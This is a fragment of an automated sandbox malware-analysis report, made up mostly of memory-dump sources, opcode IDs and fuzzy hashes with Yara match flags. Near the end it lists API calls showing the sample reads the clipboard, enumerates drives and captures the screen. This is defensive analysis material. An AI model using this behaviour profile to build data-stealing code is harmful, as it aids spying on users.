                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F11E231104B908FD7388F25C824377BBE29B67318F198A5DC1E787AD1DB7AE10A8B40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                              • Instruction ID: f399462e58419c9d3019aec57572db2d86c2935946d127ab36988b8cbde57321
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A0171745082828FD7128F2994206A6FBE0EF63314F1896C7D4D58BA83C368A985C7A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                              • Instruction ID: 7c31baca782ad02922ca5e829ffcf5bb556e4b53a18826b0422cfa525d643211
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F50171201082D2CFD7128F28D410BA6FBE0AF53318F1896C6C4E58B683C3659A45CB65
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                              • Instruction ID: 925483313e90eaab4478f3efb897dfea373d722ea9097d537696ebe3f586dc89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B90184305082C28ED7128F2984207A6FFA0EF63314F1895C7D4D58F6C3C3689985C7A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
                                                                                                                                                                                                                              • Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                              • Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                              • Instruction ID: abe654b6d27105042b3c86ac39ee4ee0ebe4dc44a27e821b60b9775da4bd7e42
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD01A2201082D2CFEB124F288410BA6FFE0AF53318F1896C6C4E58F6C3C36A9A45CB65
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
                                                                                                                                                                                                                              • Instruction ID: aeb07c95293702a8e9c82a14ce01c8abf8685394bb5eeb4a952995e8f5614748
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 840126605042D2CFEB118F28D410BA6FBE0EF53328F1896D6C8E58F282C776C546CB61
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                              • Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                              • Instruction ID: 3b1472c2ed3d82fae5f726993b72df0ca27146a84ef9b0403f79be07911019f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF0162205082D2CFEB124B299410BB5FFE0AF53318F1896D6D5E58F6C3D36A8545C765
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                              • Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                              • Instruction ID: 89aa68aee3f0c7d3e9d532a3440f95eefe7cd462e2fd9ce6836b48db05ad1268
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C411087465C3804BD318CF18D98075EBBE29BC6214F244A1CD5C117255DBB1950ACB66
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                              • Instruction ID: 0ca6442ff78776506e07a585e0535d9a3b0b16070ec018f7de24f64830c347c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801F26154D3D18BD7268F3494553EABBE18F93314F0848EEC4C147182EB39814BC729
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                              • Instruction ID: 764d9d3a4717be79920da73eaae230af95e7e9d95c2812270fe992c1b9b69a95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE09A389141058FC708CF58C862677B7B0EF0B301F14A06AD982EB3A0E3389D02C7AC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                              • Instruction ID: e93e9132e2feaf7fe277fc3af8bb0a937f5cc3d8439fbde2920254416a1ab642
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4819dc0f6de97b22ad09cbe1b8aaee834e7d75527e88b13adc304dc11fbca5b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E0DF789501458FC704CF58C862677B7B0EF0B304F14A469D983EB320E738A905CBAC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                              • Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                              • Instruction ID: e4aa13de47d4e3a72d468494faf0dd351b7d0eb60dfa73d3ed52421cb319b9cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29E07D346986C09FC218EB15DC708397363AF81308722542D815B27E51CF74A846CF0E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                              • Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                              • Instruction ID: b87c4c617f1eaa513dd9b068108222690da8250f3008ef53fab432944c6c1c3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14D0A7715887B14E57688D7854A087BFBE4E947516B1815DEE8E1E7505D320EC028658
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                              • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                              • Instruction ID: 62cff17d4c1cdc4c56f86c51933c05a30d64b215896bfd7d90cb1a7faceae8ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9C04C69A6C4008A964CCB15BC5053162769B8B254715E029802E53255E6249457C94D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                              • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                              • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                              • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                              • API String ID: 2832541153-984153585
                                                                                                                                                                                                                              • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                              • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                              • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                                                                                                                                                                              • API String ID: 2832541153-984153585
                                                                                                                                                                                                                              • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                              • Instruction ID: 2b6118f6eb20f92dbe2f28c2e2aa1d22913ecf52ee3616a2e57c673b48148740
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93415A7050C7818EE311EF78948831FBFE5AB92318F05496DE4D987292D7B9C588CBA7
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DrivesLogical
                                                                                                                                                                                                                              • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                                                                                                                                              • API String ID: 999431828-351939610
                                                                                                                                                                                                                              • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                              • Instruction ID: 313282781f6832a858dbc99d5e7e3f44e7c19c910098f6e13d39fa05238217cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0131C9B41493449FC710DF29C85122FBBB2FFC2758F45981CE5964B620EB799946CB42
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02176BF0
                                                                                                                                                                                                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 02176C11
                                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 02176C21
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02176C28
                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02176C37
                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02176C42
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 02176C4E
